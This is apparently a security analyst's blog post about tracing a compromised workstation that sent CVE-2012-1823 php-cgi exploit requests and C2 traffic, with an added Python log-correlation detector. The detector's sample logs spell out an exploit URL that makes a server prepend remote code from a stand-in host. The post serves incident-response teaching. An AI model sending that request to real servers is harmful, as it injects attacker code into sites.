That’s often the question I get asked by friends and family, and to be honest it’s hard to explain to non-techies so I figured I’d pick out a recent example of a typical malware find and cleanup at work and blog about it.
So it all started in the morning when I opened the daily report I email to myself from the proxy server, which flags URL requests in categories I consider malicious that were accessed during the previous 24 hours. After blowing past the usual false positives, one stood out to me: music.gr (the TLD for Greece). The report does not give full HTTP headers, just the hostname, so I had to look up the same hit in the proxy's reporting server to get the time/date/username of the HTTP request. Then I moved to the SIEM (log manager) to get correlated logs from the FWs, netflow, and the parsed raw proxy logs showing all the fields, with a start and end time of +/- 5 mins around the hit.
In doing so I saw obviously bad outbound traffic from the suspect host, with what looked like URLs centered around webmail. This is not surprising, as webmail is a significant weak spot in many corporations. Anyway, here are some of the logs I was presented with, a bit sanitized.
The long URLs looked interesting and familiar to me, and then I remembered they looked similar to the logs one of the isc.sans.org handlers posted about HERE. They are attempts to exploit the PHP vulnerability CVE-2012-1823 by rewriting the PHP configuration and making the server append the certainly malicious code hosted at hxxp://188.8.131.52/info3.txt to the site's index.html. I was able to get the malicious code from the link using Malzilla even days later as I write this. That code looked like this:
This appears to be a short base64 encoded string. When decoded it was non-printable in ASCII. I'm not sure what its purpose is; perhaps it was just a way to mark servers that have been exploited successfully, or it was further obfuscated with a key of some sort. I found this Snort blog post about the topic; they had a good idea to just switch to info2.txt, which had a more expected code to inject, the c99 shell.
Anyway, this client was attempting to attack other internet servers through my company's network. So that's not good! Also, krasguatanany.ru looks like a funky URL, and it turned out to be C2 (command and control) attempts.
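The workflow above (pull the flagged proxy hit, then correlate everything the same source did in the proxy and firewall logs within +/- 5 minutes) can be scripted against parsed log lines. The following is an added example, not code from the original post: the log lines are constructed (documentation IPs, a made-up user), the field layout is assumed, and the CVE-2012-1823 check relies on the public description of the bug (php-cgi treated a query string with no literal `=` as command-line options, so `-d` directives percent-encoded into the query rewrote php.ini settings per request).

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, unquote_plus

# Constructed sample logs (not from the original post).  Proxy: time user src method url
PROXY_LOGS = """\
2012-06-12 08:14:02 jdoe 10.1.2.34 GET http://intranet.example/home
2012-06-12 08:15:41 jdoe 10.1.2.34 GET http://music.gr/index.php?-d+allow_url_include%3DOn+-d+auto_prepend_file%3Dhttp%3A%2F%2F198.51.100.7%2Finfo3.txt
2012-06-12 08:15:55 jdoe 10.1.2.34 GET http://www.example.net/
2012-06-12 08:16:03 jdoe 10.1.2.34 POST http://krasguatanany.ru/gate.php
2012-06-12 09:40:00 asmith 10.1.2.50 GET http://news.example.org/
"""
# Firewall: time action src dst:port
FW_LOGS = """\
2012-06-12 08:15:40 allow 10.1.2.34 203.0.113.9:80
2012-06-12 08:16:02 allow 10.1.2.34 203.0.113.77:80
2012-06-12 08:30:00 allow 10.1.2.50 203.0.113.5:443
"""
TS = "%Y-%m-%d %H:%M:%S"

def parse(text, fields):
    """Split whitespace-delimited lines into dicts; the first two tokens form the timestamp."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        rec = dict(zip(fields, parts[2:]))
        rec["time"] = datetime.strptime(" ".join(parts[:2]), TS)
        out.append(rec)
    return out

def is_php_cgi_arg_injection(url):
    """CVE-2012-1823 tell-tale: a query string with no literal '=' that decodes to
    php-cgi options, i.e. starts with '-' and passes '-d' ini directives."""
    raw = urlsplit(url).query
    if not raw or "=" in raw:      # a literal '=' makes php-cgi treat it as ordinary CGI input
        return False
    decoded = unquote_plus(raw)
    return decoded.startswith("-") and re.search(r"(^|\s)-d\s", decoded) is not None

def find_exploit_attempts(proxy):
    return [r for r in proxy if is_php_cgi_arg_injection(r["url"])]

def correlate(hit, proxy, fw, minutes=5):
    """Everything the hit's source did in the proxy and firewall logs within +/- minutes."""
    lo, hi = hit["time"] - timedelta(minutes=minutes), hit["time"] + timedelta(minutes=minutes)
    same = lambda r: r["src"] == hit["src"] and lo <= r["time"] <= hi
    return [r for r in proxy if same(r)], [r for r in fw if same(r)]

PROXY = parse(PROXY_LOGS, ["user", "src", "method", "url"])
FW = parse(FW_LOGS, ["action", "src", "dst"])

if __name__ == "__main__":
    for hit in find_exploit_attempts(PROXY):
        p, f = correlate(hit, PROXY, FW)
        print(hit["time"], hit["user"], "proxy hosts:", sorted({urlsplit(r["url"]).hostname for r in p}))
        print("  fw destinations:", sorted(r["dst"] for r in f))
```

Run against the sample data it reports the one php-cgi argument-injection request from jdoe and, in the same five-minute window, the krasguatanany.ru POST and two firewall sessions from that host.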
At this point I called the user and asked him to disconnect from the network, opened a helpdesk case, asked desktop support to bring me the computer, and started taking a forensic image of the drive. This was more for practice and to mess around with later, as I didn't believe this was more than just "mass-malware" or a common bot infection rather than a targeted attack. The machine was scanned with several anti-malware tools and cleaned to my satisfaction, finding some Trojans and random obfuscated files.